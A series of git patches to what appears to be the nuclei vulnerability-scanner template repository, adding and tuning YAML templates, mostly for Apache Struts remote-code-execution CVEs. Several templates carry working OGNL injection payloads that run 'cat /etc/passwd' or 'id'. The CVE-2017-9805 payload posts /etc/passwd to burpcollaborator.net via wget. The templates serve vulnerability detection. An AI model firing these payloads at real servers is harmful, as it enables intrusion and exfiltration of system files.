sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 22 Feb 2021 12:31:32 +0530 Subject: [PATCH 013/370] improved matcher and tags update --- cves/2007/CVE-2007-4556.yaml | 2 +- cves/2012/CVE-2012-0392.yaml | 2 +- cves/2012/CVE-2012-0838.yaml | 6 ++++-- cves/2013/CVE-2013-1966.yaml | 2 +- cves/2013/CVE-2013-2134.yaml | 2 +- cves/2013/CVE-2013-2251.yaml | 2 +- cves/2017/CVE-2017-12611.yaml | 2 +- cves/2017/CVE-2017-5638.yaml | 6 +++--- cves/2017/CVE-2017-9805.yaml | 2 +- cves/2020/CVE-2020-17530.yaml | 2 +- exposures/logs/struts-debug-mode.yaml | 2 +- 11 files changed, 16 insertions(+), 14 deletions(-) diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml index 6a6da29d52..09223acbbb 100644 --- a/cves/2007/CVE-2007-4556.yaml +++ b/cves/2007/CVE-2007-4556.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://www.guildhab.top/?p=2326 - tags: cve,cve2007,apache,rce + tags: cve,cve2007,apache,rce,struts requests: - method: POST diff --git a/cves/2012/CVE-2012-0392.yaml b/cves/2012/CVE-2012-0392.yaml index d89fe41d73..1b40dea9cb 100644 --- a/cves/2012/CVE-2012-0392.yaml +++ b/cves/2012/CVE-2012-0392.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://blog.csdn.net/weixin_43416469/article/details/113850545 - tags: cve, cve2012,apache,rce + tags: cve, cve2012,apache,rce,struts requests: - method: GET diff --git a/cves/2012/CVE-2012-0838.yaml b/cves/2012/CVE-2012-0838.yaml index bf8edf7149..aabf87fb1b 100644 --- a/cves/2012/CVE-2012-0838.yaml +++ b/cves/2012/CVE-2012-0838.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://blog.csdn.net/weixin_43416469/article/details/113849942 - tags: cve,cve2012,apache,rce + tags: cve,cve2012,apache,struts,rce requests: - method: POST @@ -21,7 +21,9 @@ requests: - type: regex regex: - - "uid=*" + - "uid(.*)" + - "gid(.*)" + part: body condition: and - type: status diff --git a/cves/2013/CVE-2013-1966.yaml b/cves/2013/CVE-2013-1966.yaml index b2a30a9242..6a4732774f 100644 --- a/cves/2013/CVE-2013-1966.yaml +++ b/cves/2013/CVE-2013-1966.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://blog.csdn.net/weixin_43416469/article/details/113636581?utm_medium=distribute.pc_relevant_t0.none-task-blog-OPENSEARCH-1.control&dist_request_id=979f56d5-0937-4e8d-8e1e-79f3a5d24e14&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-OPENSEARCH-1.control - tags: cve,cve2013,apache,rce + tags: cve,cve2013,apache,rce,struts requests: - method: GET diff --git a/cves/2013/CVE-2013-2134.yaml b/cves/2013/CVE-2013-2134.yaml index b27abb6fbf..ad8111c610 100644 --- a/cves/2013/CVE-2013-2134.yaml +++ b/cves/2013/CVE-2013-2134.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://blog.csdn.net/weixin_43416469/article/details/113852197?utm_medium=distribute.pc_relevant.none-task-blog-OPENSEARCH-11.control&dist_request_id=979f56d5-0937-4e8d-8e1e-79f3a5d24e14&depth_1-utm_source=distribute.pc_relevant.none-task-blog-OPENSEARCH-11.control - tags: cve,cve2013,apache,rce + tags: cve,cve2013,apache,rce,struts requests: - method: GET diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml index 591593f19b..7bce805f94 100644 --- a/cves/2013/CVE-2013-2251.yaml +++ b/cves/2013/CVE-2013-2251.yaml @@ -5,7 +5,7 @@ info: author: exploitation & @dwisiswant0 severity: critical description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code. - tags: cve,cve2013,rce + tags: cve,cve2013,rce,struts,apache requests: - payloads: diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml index 7ead98e310..2519feaf3f 100644 --- a/cves/2017/CVE-2017-12611.yaml +++ b/cves/2017/CVE-2017-12611.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://nvd.nist.gov/vuln/detail/CVE-2017-12611 - tags: cve, cve2017,apache,rce + tags: cve,cve2017,apache,rce,struts requests: - method: POST diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index 615cf36cac..6696adbe72 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml @@ -1,10 +1,10 @@ id: CVE-2017-5638 info: - author: "Random Robbie" - name: "Struts2 RCE " + author: Random Robbie + name: Struts2 RCE severity: critical description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server. - tags: cve,cve2017,struts,rce + tags: cve,cve2017,struts,rce,apache # This template supports the detection part only. # Do not test any website without permission diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml index 3e11c53b73..63061429ce 100644 --- a/cves/2017/CVE-2017-9805.yaml +++ b/cves/2017/CVE-2017-9805.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9805 - tags: cve,cve2017,apache,rce + tags: cve,cve2017,apache,rce,struts requests: - method: POST diff --git a/cves/2020/CVE-2020-17530.yaml b/cves/2020/CVE-2020-17530.yaml index 38c7823e00..9de289e9fe 100644 --- a/cves/2020/CVE-2020-17530.yaml +++ b/cves/2020/CVE-2020-17530.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html - tags: cve,cve2020,apache,rce + tags: cve,cve2020,apache,rce,struts # Forced OGNL evaluation, when evaluated on raw user input in tag attributes, # may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. diff --git a/exposures/logs/struts-debug-mode.yaml b/exposures/logs/struts-debug-mode.yaml index d72731b366..3371fb9fca 100644 --- a/exposures/logs/struts-debug-mode.yaml +++ b/exposures/logs/struts-debug-mode.yaml @@ -4,7 +4,7 @@ info: name: Apache Struts setup in Debug-Mode author: pd-team severity: low - tags: logs,struts + tags: logs,struts,apache requests: - method: GET From d0580f52b6ecc07c7dba77ff5684e69a7ac681a6 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 22 Feb 2021 12:28:11 +0000 Subject: [PATCH 014/370] Create CVE-2013-1965.yaml --- cves/2013/CVE-2013-1965.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2013/CVE-2013-1965.yaml diff --git a/cves/2013/CVE-2013-1965.yaml b/cves/2013/CVE-2013-1965.yaml new file mode 100644 index 0000000000..02706ba648 --- /dev/null +++ b/cves/2013/CVE-2013-1965.yaml @@ -0,0 +1,29 @@ +id: CVE-2013-1965 + +info: + name: Apache Struts2 S2-012 RCE + author: pikpikcu + severity: critical + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-1965 + tags: cve,cve2013,apache,rce,struts2 + +requests: + - method: POST + path: + - "{{BaseURL}}/user.action" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 From 16db75f87631298aa0b812f820bbc2f7d65658c2 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 22 Feb 2021 12:42:50 +0000 Subject: [PATCH 015/370] Create CVE-2013-2135.yaml --- cves/2013/CVE-2013-2135.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2013/CVE-2013-2135.yaml diff --git a/cves/2013/CVE-2013-2135.yaml b/cves/2013/CVE-2013-2135.yaml new file mode 100644 index 0000000000..8b26075b94 --- /dev/null +++ b/cves/2013/CVE-2013-2135.yaml @@ -0,0 +1,25 @@ +id: CVE-2013-2135 + +info: + name: Apache Struts2 S2-015 RCE + author: pikpikcu + severity: critical + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2135 + tags: cve,cve2013,apache,rce,struts2 + +requests: + - method: GET + path: + - "{{BaseURL}}/param.action${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}.action" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "uid=*" + condition: and + + - type: status + status: + - 404 From 837d43a4304ce7fd99dd9d6cfbd4515e5a8f8dc8 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 22 Feb 2021 23:47:58 +0530 Subject: [PATCH 016/370] few changes --- cves/2013/CVE-2013-1965.yaml | 4 ++-- cves/2013/CVE-2013-2135.yaml | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2013/CVE-2013-1965.yaml b/cves/2013/CVE-2013-1965.yaml index 02706ba648..38a168df56 100644 --- a/cves/2013/CVE-2013-1965.yaml +++ b/cves/2013/CVE-2013-1965.yaml @@ -5,14 +5,14 @@ info: author: pikpikcu severity: critical reference: https://nvd.nist.gov/vuln/detail/CVE-2013-1965 - tags: cve,cve2013,apache,rce,struts2 + tags: cve,cve2013,apache,rce,struts requests: - method: POST path: - "{{BaseURL}}/user.action" headers: - Content-Type: application/x-www-form-urlencoded + Content-Type: application/x-www-form-urlencoded body: | name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D diff --git a/cves/2013/CVE-2013-2135.yaml b/cves/2013/CVE-2013-2135.yaml index 8b26075b94..49b8b8479d 100644 --- a/cves/2013/CVE-2013-2135.yaml +++ b/cves/2013/CVE-2013-2135.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2135 - tags: cve,cve2013,apache,rce,struts2 + tags: cve,cve2013,apache,rce,struts requests: - method: GET @@ -17,7 +17,7 @@ requests: - type: regex regex: - - "uid=*" + - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" condition: and - type: status From dae21b45887157eb72372170070e45f1d03e8b17 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 23 Feb 2021 01:42:08 +0000 Subject: [PATCH 017/370] =?UTF-8?q?Fix=20Payloads=20=F0=9F=9B=A0?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2017/CVE-2017-9805.yaml | 60 +++++++++++++++++++++++++++++++++--- 1 file changed, 56 insertions(+), 4 deletions(-) diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml index 63061429ce..5a1193818f 100644 --- a/cves/2017/CVE-2017-9805.yaml +++ b/cves/2017/CVE-2017-9805.yaml @@ -11,14 +11,66 @@ requests: - method: POST path: - "{{BaseURL}}/struts2-rest-showcase/orders/3" - - "{{BaseURL}}/orders" + - "{{BaseURL}}/orders/3" headers: Content-Type: application/xml body: | - - 0 false 0 wget --post-file /etc/passwd burpcollaborator.net false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 - + + + 0 + + + + + + false + 0 + + + + + + wget + --post-file + /etc/passwd + burpcollaborator.net + + false + + + + + java.lang.ProcessBuilder + start + + + asdasd + + asdasd + + + + + + false + 0 + 0 + false + + false + + + + 0 + + + + + + + + matchers-condition: and From 3be6ea99fda7c97bb0b9aaa508071166c7e93d26 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 23 Feb 2021 01:51:14 +0000 Subject: [PATCH 018/370] update tags --- cves/2016/CVE-2016-3081.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml index de0e0dd738..f0478d8b38 100644 --- a/cves/2016/CVE-2016-3081.yaml +++ b/cves/2016/CVE-2016-3081.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: high reference: https://cwiki.apache.org/confluence/display/WW/S2-032 - tags: cve,cve2016,struts,rce + tags: cve,cve2016,struts,rce,apache requests: - raw: From 7eff3819e8774be7dfa4389e971950822a1f74eb Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 23 Feb 2021 02:37:32 +0000 Subject: [PATCH 019/370] =?UTF-8?q?update=20payloads=20CVE-2007-4556=20?= =?UTF-8?q?=F0=9F=9B=A0?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2007/CVE-2007-4556.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml index 09223acbbb..ba0fb52f99 100644 --- a/cves/2007/CVE-2007-4556.yaml +++ b/cves/2007/CVE-2007-4556.yaml @@ -14,14 +14,14 @@ requests: headers: Content-Type: application/x-www-form-urlencoded body: | - username=test&password=%25%7B123456789*987654321%7D + username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D matchers-condition: and matchers: - - type: word - words: - - "-67153019" + - type: regex + regex: + - "root:[x*]:0:0" condition: and - type: status From df532f676285c0122e24aa9121cb009c7076f71f Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 24 Feb 2021 04:29:30 +0000 Subject: [PATCH 020/370] Create CVE-2018-11776.yaml --- cves/2018/CVE-2018-11776.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2018/CVE-2018-11776.yaml diff --git a/cves/2018/CVE-2018-11776.yaml b/cves/2018/CVE-2018-11776.yaml new file mode 100644 index 0000000000..522ae3000b --- /dev/null +++ b/cves/2018/CVE-2018-11776.yaml @@ -0,0 +1,25 @@ +id: CVE-2018-11776 + +info: + name: Apache Struts2 S2-057 RCE + author: pikpikcu + severity: critical + reference: https://github.com/jas502n/St2-057 + tags: cve,cve2018,apache,rce,struts2 + +requests: + - method: GET + path: + - "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 From 8927253cb3f1e16f6164b4b92a2c6cfeadcd81a9 Mon Sep 17 00:00:00 2001 From: ganoes Date: Thu, 25 Feb 2021 11:13:01 +0100 Subject: [PATCH 021/370] Improvement of the regex in open redirection template --- vulnerabilities/generic/open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index 662007159c..a1c0961a85 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -46,5 +46,5 @@ requests: matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com(?:\s*?)$' part: header From 5c87671a004c769763b759aaa4c7e16536c52dbc Mon Sep 17 00:00:00 2001 From: Joan Bono Date: Thu, 25 Feb 2021 16:18:05 +0100 Subject: [PATCH 022/370] Create gunicorn-detect.yml --- technologies/gunicorn-detect.yml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/gunicorn-detect.yml diff --git a/technologies/gunicorn-detect.yml b/technologies/gunicorn-detect.yml new file mode 100644 index 0000000000..69f286e77b --- /dev/null +++ b/technologies/gunicorn-detect.yml @@ -0,0 +1,25 @@ +id: gunicorn-detect +info: + name: Detect Gunicorn Server + author: joanbono + description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: regex + part: header + regex: + - gunicorn+ + + extractors: + - type: kval + part: header + kval: + - Server From 14786f26dfe2a09551bad27113c880543ad3cb9d Mon Sep 17 00:00:00 2001 From: YashGoti <39102999+YashGoti@users.noreply.github.com> Date: Thu, 25 Feb 2021 21:05:25 +0530 Subject: [PATCH 023/370] Create wp-license --- exposures/files/wp-license | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposures/files/wp-license diff --git a/exposures/files/wp-license b/exposures/files/wp-license new file mode 100644 index 0000000000..132050d405 --- /dev/null +++ b/exposures/files/wp-license @@ -0,0 +1,30 @@ +id: wp-license + +info: + name: WordPress License File Discloser + author: yashgoti + severity: info + description: Wordpress default license file discloser to identify wordpress is running + +requests: + - method: GET + path: + - "{{BaseURL}}/license.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "WordPress" + - " - " + - "Web publishing software" + condition: and + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 From 3eb0e91444f8bff5ca586ed0135e014b1bba07df Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 22:57:42 +0530 Subject: [PATCH 024/370] misc changes --- exposures/files/wp-license | 30 ------------------------------ miscellaneous/wp-license.yaml | 21 +++++++++++++++++++++ 2 files changed, 21 insertions(+), 30 deletions(-) delete mode 100644 exposures/files/wp-license create mode 100644 miscellaneous/wp-license.yaml diff --git a/exposures/files/wp-license b/exposures/files/wp-license deleted file mode 100644 index 132050d405..0000000000 --- a/exposures/files/wp-license +++ /dev/null @@ -1,30 +0,0 @@ -id: wp-license - -info: - name: WordPress License File Discloser - author: yashgoti - severity: info - description: Wordpress default license file discloser to identify wordpress is running - -requests: - - method: GET - path: - - "{{BaseURL}}/license.txt" - - matchers-condition: and - matchers: - - type: word - words: - - "WordPress" - - " - " - - "Web publishing software" - condition: and - - - type: word - words: - - "text/plain" - part: header - - - type: status - status: - - 200 diff --git a/miscellaneous/wp-license.yaml b/miscellaneous/wp-license.yaml new file mode 100644 index 0000000000..35ab078af8 --- /dev/null +++ b/miscellaneous/wp-license.yaml @@ -0,0 +1,21 @@ +id: wp-license + +info: + name: WordPress license file disclosure + author: yashgoti + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/license.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "WordPress - Web publishing software" + + - type: status + status: + - 200 From 1253bd71dc03dad00e687fc52358baf7da9fd3e6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 25 Feb 2021 17:28:25 +0000 Subject: [PATCH 025/370] Auto Update README [Thu Feb 25 17:28:25 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 33d51dc616..0fbb83b7e5 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 206 | vulnerabilities | 98 | exposed-panels | 74 | | exposures | 55 | technologies | 46 | misconfiguration | 48 | -| workflows | 21 | miscellaneous | 13 | default-logins | 11 | +| workflows | 21 | miscellaneous | 14 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**62 directories, 603 files**. +**62 directories, 604 files**. From 1355185b452cb3f0458d70ffdf4b9af417d5a7bc Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 23:04:21 +0530 Subject: [PATCH 026/370] improved matcher --- vulnerabilities/other/weiphp-path-traversal.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/other/weiphp-path-traversal.yaml b/vulnerabilities/other/weiphp-path-traversal.yaml index ebd26e61b2..b50c3ba268 100644 --- a/vulnerabilities/other/weiphp-path-traversal.yaml +++ b/vulnerabilities/other/weiphp-path-traversal.yaml @@ -42,9 +42,8 @@ requests: matchers: - type: word words: - - php - - hostname - - username - - password + - https://weiphp.cn + - WeiPHP + - DB_PREFIX condition: and part: body \ No newline at end of file From b24a1eecaeb73d9cf491625952bece4a4b5370b9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 25 Feb 2021 23:21:42 +0530 Subject: [PATCH 027/370] Create wordpress-affiliatewp-allowed-products.yaml --- ...ordpress-affiliatewp-allowed-products.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 vulnerabilities/wordpress/wordpress-affiliatewp-allowed-products.yaml diff --git a/vulnerabilities/wordpress/wordpress-affiliatewp-allowed-products.yaml b/vulnerabilities/wordpress/wordpress-affiliatewp-allowed-products.yaml new file mode 100644 index 0000000000..f09821fa76 --- /dev/null +++ b/vulnerabilities/wordpress/wordpress-affiliatewp-allowed-products.yaml @@ -0,0 +1,22 @@ +id: affiliatewp-allowed-products + +info: + name: WordPress Plugin "AffiliateWP – Allowed Products" Log Disclosure + author: dhiyaneshDK + severity: low + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/uploads/affwp-debug.log' + + matchers-condition: and + matchers: + - type: word + words: + - 'woocommerce' + condition: and + + - type: status + status: + - 200 From 9bcd36338e14281ec9f7651eadcf3518a490b436 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 23:38:40 +0530 Subject: [PATCH 028/370] improved matcher --- vulnerabilities/thinkcmf/thinkcmf-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml b/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml index ed34e44aaf..710cf20b0b 100644 --- a/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml +++ b/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml @@ -20,7 +20,7 @@ requests: - type: regex regex: - "root:[x*]:0:0:" - - "\\[(font|extension|file)s\\]" + - "bit app support" - 'ThinkCMF' part: body From acd1ab4735556f042e8147d94daddd95b310954f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 00:21:07 +0530 Subject: [PATCH 029/370] misc changes --- ...d-products.yaml => wordpress-affiliatewp-log.yaml} | 11 ++++++++--- workflows/wordpress-workflow.yaml | 1 + 2 files changed, 9 insertions(+), 3 deletions(-) rename vulnerabilities/wordpress/{wordpress-affiliatewp-allowed-products.yaml => wordpress-affiliatewp-log.yaml} (65%) diff --git a/vulnerabilities/wordpress/wordpress-affiliatewp-allowed-products.yaml b/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml similarity index 65% rename from vulnerabilities/wordpress/wordpress-affiliatewp-allowed-products.yaml rename to vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml index f09821fa76..147815db69 100644 --- a/vulnerabilities/wordpress/wordpress-affiliatewp-allowed-products.yaml +++ b/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml @@ -1,4 +1,4 @@ -id: affiliatewp-allowed-products +id: wordpress-affiliatewp-log info: name: WordPress Plugin "AffiliateWP – Allowed Products" Log Disclosure @@ -14,8 +14,13 @@ requests: matchers: - type: word words: - - 'woocommerce' - condition: and + - 'Referral could not be retrieved' + - 'Affiliate CSV' + + - type: word + words: + - 'text/plain' + part: header - type: status status: diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 0405845185..71d5dc5a5e 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -43,3 +43,4 @@ workflows: - template: vulnerabilities/wordpress/wp-xmlrpc.yaml - template: vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml - template: vulnerabilities/wordpress/wp-enabled-registration.yaml + - template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml From 56557666fbcc4f8935ee4eaf47eba93831344c4a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 25 Feb 2021 19:06:24 +0000 Subject: [PATCH 030/370] Auto Update README [Thu Feb 25 19:06:24 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 0fbb83b7e5..70dc8daaba 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 206 | vulnerabilities | 98 | exposed-panels | 74 | +| cves | 206 | vulnerabilities | 99 | exposed-panels | 74 | | exposures | 55 | technologies | 46 | misconfiguration | 48 | | workflows | 21 | miscellaneous | 14 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**62 directories, 604 files**. +**62 directories, 605 files**. From dfc59f32afe8780d523d6daa96e9a88ac678c923 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 00:40:01 +0530 Subject: [PATCH 031/370] ext update --- technologies/{gunicorn-detect.yml => gunicorn-detect.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{gunicorn-detect.yml => gunicorn-detect.yaml} (100%) diff --git a/technologies/gunicorn-detect.yml b/technologies/gunicorn-detect.yaml similarity index 100% rename from technologies/gunicorn-detect.yml rename to technologies/gunicorn-detect.yaml From 633499e27baecc594fb3ff47131789ab7fc57064 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 25 Feb 2021 19:10:35 +0000 Subject: [PATCH 032/370] Auto Update README [Thu Feb 25 19:10:35 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 70dc8daaba..05d10da0c3 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 206 | vulnerabilities | 99 | exposed-panels | 74 | -| exposures | 55 | technologies | 46 | misconfiguration | 48 | +| exposures | 55 | technologies | 47 | misconfiguration | 48 | | workflows | 21 | miscellaneous | 14 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**62 directories, 605 files**. +**62 directories, 606 files**. From 5241e0f9607fba74f25157dfe1c1374e30a18551 